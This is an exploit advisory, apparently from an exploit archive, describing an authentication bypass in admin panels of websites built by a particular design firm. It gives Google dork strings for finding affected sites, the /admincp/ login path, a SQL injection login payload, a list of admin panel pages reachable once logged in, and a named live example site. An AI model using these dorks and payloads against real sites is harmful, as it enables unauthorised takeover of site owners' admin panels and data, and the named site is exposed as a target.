Designed & Hosted By MWC Design England Authentication Bypass Vulnerability

#################################################################################################

# Exploit Title : Designed & Hosted By MWC Design England Authentication Bypass Vulnerability
# Author [ Discovered By ] : AYAR from Cyberizm Digital Security Army
# Date : 28/09/2018
# Vendor Homepage : mwcdesign.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-592  [ Authentication Bypass Issues ]

#################################################################################################

# Google Dork  : 

intext:''Designe & Hosted By. MWC''

intext:''Designed & Hosted By. MWC''

intext:''Design By: MWC''

# Admin Page Login Path => /admincp/

# Exploit : 

Admin Username : anything' OR 'x'='x

Admin Password : anything' OR 'x'='x

# Useable Admin Control Panel URL Links => 

/admincp/mmainsections.php
/admincp/clints.php
/admincp/vinquiries.php
/admincp/mnews.php
/admincp/settings.php
/admincp/changepass.php

#################################################################################################

# Example Vulnerable Site => losotecintl.com/admincp/

#################################################################################################

# Discovered By AYAR from Cyberizm.Org Digital Security Team

#################################################################################################

# Thanks to Cyberizm Team => KingSkrupellos ~ H4CK4L ~ The_ZiziL ~  1hT1y@R

DARKDAYS ~ Leader Shawai ~ OrJiNaL ~ Stallk3r ~ Meczup ~ Dessy and other precious members.

#################################################################################################